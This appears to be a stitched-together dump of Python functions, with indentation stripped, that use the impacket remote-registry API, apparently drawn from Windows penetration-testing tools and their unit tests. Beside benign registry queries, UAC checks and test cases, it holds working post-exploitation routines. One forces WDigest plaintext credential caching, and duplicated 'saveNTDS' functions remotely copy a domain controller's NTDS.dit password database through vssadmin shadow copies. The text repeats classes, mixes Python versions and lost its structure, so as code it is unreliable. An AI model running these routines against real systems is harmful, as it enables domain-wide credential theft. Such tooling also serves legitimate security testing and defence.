def getDefaultLoginAccount(self):
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon')
keyHandle = ans['phkResult']
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultUserName')
username = dataValue[:-1]
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultDomainName')
domain = dataValue[:-1]
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
if len(domain) > 0:
return '%s\\%s' % (domain,username)
else:
return username
except:
return None
def test_hBaseRegQueryValue(self):
dce, rpctransport, phKey = self.connect()
resp = rrp.hBaseRegOpenKey(dce, phKey, 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\x00' )
resp.dump()
resp = rrp.hBaseRegQueryValue(dce, resp['phkResult'], 'ProductName\x00')
def disable(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
self.rrp = remoteOps._RemoteOperations__rrp
if self.rrp is not None:
ans = rrp.hOpenLocalMachine(self.rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
try:
rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except:
self.logger.success('UseLogonCredential registry key not present')
try:
remoteOps.finish()
except:
pass
return
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except DCERPCException:
self.logger.success('UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
dce, rpctransport, phKey = self.connect()
resp = rrp.hOpenClassesRoot(dce)
resp.dump()
regHandle = resp['phKey']
resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
resp.dump()
phKey = resp['phkResult']
try:
resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00')
resp.dump()
except Exception as e:
print e
type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
#print data
resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
resp.dump()
resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
resp.dump()
self.assertTrue( 'HOLA COMO TE VA\x00' == data )
def query(self, dce, keyName):
# Let's strip the root key
try:
rootKey = keyName.split('\\')[0]
subKey = '\\'.join(keyName.split('\\')[1:])
except Exception:
raise Exception('Error parsing keyName %s' % keyName)
if rootKey.upper() == 'HKLM':
ans = rrp.hOpenLocalMachine(dce)
elif rootKey.upper() == 'HKU':
ans = rrp.hOpenCurrentUser(dce)
elif rootKey.upper() == 'HKCR':
ans = rrp.hOpenClassesRoot(dce)
else:
raise Exception('Invalid root key %s ' % rootKey)
hRootKey = ans['phKey']
ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,
samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS | rrp.KEY_QUERY_VALUE)
if self.__options.v:
print keyName
value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], self.__options.v)
print '\t' + self.__options.v + '\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\t', str(value[1])
elif self.__options.ve:
print keyName
value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], '')
print '\t' + '(Default)' + '\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\t', str(value[1])
elif self.__options.s:
self.__print_all_subkeys_and_entries(dce, subKey + '\\', ans2['phkResult'], 0)
else:
print keyName
self.__print_key_values(dce, ans2['phkResult'])
i = 0
while True:
try:
key = rrp.hBaseRegEnumKey(dce, ans2['phkResult'], i)
print keyName + '\\' + key['lpNameOut'][:-1]
i += 1
except Exception:
break
def saveNTDS(self):
logging.info('Searching for NTDS.dit')
# First of all, let's try to read the target NTDS.dit registry entry
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters')
keyHandle = ans['phkResult']
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
try:
dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DSA Database file')
ntdsLocation = dataValue[:-1]
ntdsDrive = ntdsLocation[:2]
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
logging.info('Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % ntdsLocation)
# Get the list of remote shadows
shadow, shadowFor = self.__getLastVSS()
if shadow == '' or (shadow != '' and shadowFor != ntdsDrive):
# No shadow, create one
self.__executeRemote('%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive)
shadow, shadowFor = self.__getLastVSS()
shouldRemove = True
if shadow == '':
raise Exception('Could not get a VSS')
else:
shouldRemove = False
# Now copy the ntds.dit to the temp directory
tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
self.__executeRemote('%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName))
if shouldRemove is True:
self.__executeRemote('%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive)
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')
remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)
return remoteFileName
def enum(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
keyHandle = ans['phkResult']
dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')
self.logger.success("Enumerating UAC status")
if uac_value == 1:
self.logger.highlight('1 - UAC Enabled')
elif uac_value == 0:
self.logger.highlight('0 - UAC Disabled')
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
remoteOps.finish()
def on_admin_login(self, context, connection):
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
keyHandle = ans['phkResult']
dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')
if uac_value == 1:
context.log.highlight('UAC Status: 1 (UAC Enabled)')
elif uac_value == 0:
context.log.highlight('UAC Status: 0 (UAC Disabled)')
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
remoteOps.finish()
def run(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System')
keyHandle = ans['phkResult']
dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA')
print_succ("{} UAC status:".format(self.peer))
if uac_value == 1:
print_att('1 - UAC Enabled')
elif uac_value == 0:
print_att('0 - UAC Disabled')
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
remoteOps.finish()
def checkNoLMHashPolicy(self):
logging.debug('Checking NoLMHash Policy')
ans = rrp.hOpenLocalMachine(self.__rrp)
self.__regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
keyHandle = ans['phkResult']
try:
dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash')
except:
noLMHash = 0
if noLMHash != 1:
logging.debug('LMHashes are being stored')
return False
logging.debug('LMHashes are NOT being stored')
return True
def wdigest_enable(self, context, smbconnection):
remoteOps = RemoteOperations(smbconnection, False)
remoteOps.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')
if int(data) == 1:
context.log.success('UseLogonCredential registry key created successfully')
try:
remoteOps.finish()
except:
pass
def enable(self):
remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
remoteOps.enableRegistry()
self.rrp = remoteOps._RemoteOperations__rrp
if self.rrp is not None:
ans = rrp.hOpenLocalMachine(self.rrp)
regHandle = ans['phKey']
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, '\x01\x00')
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
if int(data) == 1:
self.logger.success('UseLogonCredential registry key created successfully')
try:
remoteOps.finish()
except:
pass
def saveNTDS(self):
logging.info('Searching for NTDS.dit')
# First of all, let's try to read the target NTDS.dit registry entry
ans = rrp.hOpenLocalMachine(self.__rrp)
regHandle = ans['phKey']
try:
ans = rrp.hBaseRegOpenKey(
self.__rrp, self.__regHandle,
'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters')
keyHandle = ans['phkResult']
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
try:
dataType, dataValue = rrp.hBaseRegQueryValue(
self.__rrp, keyHandle, 'DSA Database file')
ntdsLocation = dataValue[:-1]
ntdsDrive = ntdsLocation[:2]
except:
# Can't open the registry path, assuming no NTDS on the other end
return None
rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
rrp.hBaseRegCloseKey(self.__rrp, regHandle)
logging.info(
'Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time'
% ntdsLocation)
# Get the list of remote shadows
shadow, shadowFor = self.__getLastVSS()
if shadow == '' or (shadow != '' and shadowFor != ntdsDrive):
# No shadow, create one
self.__executeRemote(
'%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive)
shadow, shadowFor = self.__getLastVSS()
shouldRemove = True
if shadow == '':
raise Exception('Could not get a VSS')
else:
shouldRemove = False
# Now copy the ntds.dit to the temp directory
tmpFileName = ''.join(
[random.choice(string.letters) for _ in range(8)]) + '.tmp'
self.__executeRemote(
'%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' %
(shadow, ntdsLocation[2:], tmpFileName))
if shouldRemove is True:
self.__executeRemote(
'%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' %
ntdsDrive)
self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output')
remoteFileName = RemoteFile(self.__smbConnection,
'Temp\\%s' % tmpFileName)
return remoteFileName
class RRPTests(unittest.TestCase):
def connect(self):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
dce.connect()
dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax=self.ts)
resp = rrp.hOpenLocalMachine(
dce,
MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)
return dce, rpctransport, resp['phKey']
def test_OpenClassesRoot(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenClassesRoot()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenCurrentUser(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenCurrentUser()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenLocalMachine(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenLocalMachine()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenPerformanceData(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenPerformanceData()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenUsers(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenUsers()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_BaseRegCloseKey(self):
dce, rpctransport, phKey = self.connect()
request = rrp.BaseRegCloseKey()
request['hKey'] = phKey
resp = dce.request(request)
resp.dump()
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
dce, rpctransport, phKey = self.connect()
resp = rrp.hOpenClassesRoot(dce)
resp.dump()
regHandle = resp['phKey']
resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
resp.dump()
phKey = resp['phkResult']
try:
resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ,
'HOLA COMO TE VA\x00')
resp.dump()
except Exception, e:
print e
type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
#print data
resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
resp.dump()
resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
resp.dump()
self.assertTrue('HOLA COMO TE VA\x00' == data)
def checkUAC(self, dce):
#
try:
ans = rrp.hOpenLocalMachine(dce)
regHandle = ans['phKey']
except Exception as e:
logging.debug('Exception thrown when hOpenLocalMachine: %s',
str(e))
return
self.logger.highlight('UAC Status:')
try:
resp = rrp.hBaseRegOpenKey(
dce, regHandle,
'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
)
keyHandle = resp['phkResult']
except Exception as e:
logging.debug('Exception thrown when hBaseRegOpenKey: %s', str(e))
return
#EnableLUA
try:
dataType, lua_uac_value = rrp.hBaseRegQueryValue(
dce, keyHandle, 'EnableLUA')
except Exception as e:
logging.debug('Exception thrown when hBaseRegQueryValue: %s',
str(e))
lua_uac_value = 3
pass
#LocalAccountTokenFilterPolicy
try:
dataType, latfp_uac_value = rrp.hBaseRegQueryValue(
dce, keyHandle, 'LocalAccountTokenFilterPolicy')
except Exception as e:
logging.debug('Exception thrown when hBaseRegQueryValue: %s',
str(e))
latfp_uac_value = 3
pass
#LocalAccountTokenFilterPolicy
try:
dataType, fat_uac_value = rrp.hBaseRegQueryValue(
dce, keyHandle, 'FilterAdministratorToken')
except Exception as e:
logging.debug('Exception thrown when hBaseRegQueryValue: %s',
str(e))
fat_uac_value = 3
pass
#Results
if lua_uac_value == 1:
self.logger.highlight(' enableLua = 1 (default) ')
elif lua_uac_value == 0:
self.logger.highlight(' enableLua = 0')
else:
self.logger.highlight(' enableLua key does not exist!')
if latfp_uac_value == 1:
self.logger.highlight(' LocalAccountTokenFilterPolicy = 1')
elif latfp_uac_value == 0:
self.logger.highlight(
' LocalAccountTokenFilterPolicy = 0 (default)')
else:
self.logger.highlight(
' LocalAccountTokenFilterPolicy key does not exist!')
if fat_uac_value == 1:
self.logger.highlight(' FilterAdministratorToken = 1 ')
elif fat_uac_value == 0:
self.logger.highlight(' FilterAdministratorToken = 0 (default)')
else:
self.logger.highlight(
' FilterAdministratorToken key does not exist!')
# Analysis
self.logger.highlight('')
self.logger.highlight('UAC Analysis:')
if lua_uac_value == 1:
self.logger.highlight(
'EnableLUA current setting means capabilities are determined by'
)
self.logger.highlight(
' LocalAccountTokenFilterPolicy and/or FilterAdministratorToken'
)
self.logger.highlight('')
elif lua_uac_value == 0:
self.logger.highlight(
'High integrity access available to any member of the local admins group'
)
self.logger.highlight(
' using plaintext credentials or password hashes!')
return
if latfp_uac_value == 1:
self.logger.highlight(
'LocalAccountTokenFilterPolicy configured to allow remote connections with high integrity access tokens!'
)
return
else:
self.logger.highlight(
'LocalAccountTokenFilterPolicy set to 0 tells us:')
self.logger.highlight(
' High integrity access only possible using either the plaintext pass'
)
self.logger.highlight(
' or password hash of the RID 500 local administrator')
self.logger.highlight('')
if fat_uac_value == 1:
self.logger.highlight(
'FilterAdministratorToken set to 1 tells us High integrity access not available for RID 500 local administrator'
)
else: # 0 or missing
self.logger.highlight(
'The FilterAdministratorToken setting should have no effect in this case'
)
class RRPTests(unittest.TestCase):
def connect_scmr(self):
rpctransport = transport.DCERPCTransportFactory(
r'ncacn_np:%s[\pipe\svcctl]' % self.machine)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
# dce.set_max_fragment_size(32)
dce.connect()
dce.bind(scmr.MSRPC_UUID_SCMR)
lpMachineName = 'DUMMY\x00'
lpDatabaseName = 'ServicesActive\x00'
desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \
scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | \
scmr.SERVICE_ENUMERATE_DEPENDENTS | scmr.SC_MANAGER_ENUMERATE_SERVICE
resp = scmr.hROpenSCManagerW(dce, lpMachineName, lpDatabaseName,
desiredAccess)
scHandle = resp['lpScHandle']
return dce, rpctransport, scHandle
def connect(self):
if self.rrpStarted is not True:
dce, rpctransport, scHandle = self.connect_scmr()
desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \
scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS
resp = scmr.hROpenServiceW(dce, scHandle, 'RemoteRegistry\x00',
desiredAccess)
resp.dump()
serviceHandle = resp['lpServiceHandle']
try:
resp = scmr.hRStartServiceW(dce, serviceHandle)
except Exception as e:
if str(e).find('ERROR_SERVICE_ALREADY_RUNNING') >= 0:
pass
else:
raise
resp = scmr.hRCloseServiceHandle(dce, scHandle)
self.rrpStarted = True
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if len(self.hashes) > 0:
lmhash, nthash = self.hashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.username, self.password,
self.domain, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY)
dce.connect()
dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax=self.ts)
resp = rrp.hOpenLocalMachine(
dce,
MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS)
return dce, rpctransport, resp['phKey']
def test_OpenClassesRoot(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenClassesRoot()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenCurrentUser(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenCurrentUser()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenLocalMachine(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenLocalMachine()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenPerformanceData(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenPerformanceData()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_OpenUsers(self):
dce, rpctransport, phKey = self.connect()
request = rrp.OpenUsers()
request['ServerName'] = NULL
request['samDesired'] = MAXIMUM_ALLOWED
resp = dce.request(request)
resp.dump()
def test_BaseRegCloseKey(self):
dce, rpctransport, phKey = self.connect()
request = rrp.BaseRegCloseKey()
request['hKey'] = phKey
resp = dce.request(request)
resp.dump()
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
dce, rpctransport, phKey = self.connect()
resp = rrp.hOpenClassesRoot(dce)
resp.dump()
regHandle = resp['phKey']
resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
resp.dump()
phKey = resp['phkResult']
try:
resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ,
'HOLA COMO TE VA\x00')
resp.dump()
except Exception, e:
print e
type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
#print data
resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
resp.dump()
resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
resp.dump()
self.assertTrue('HOLA COMO TE VA\x00' == data)
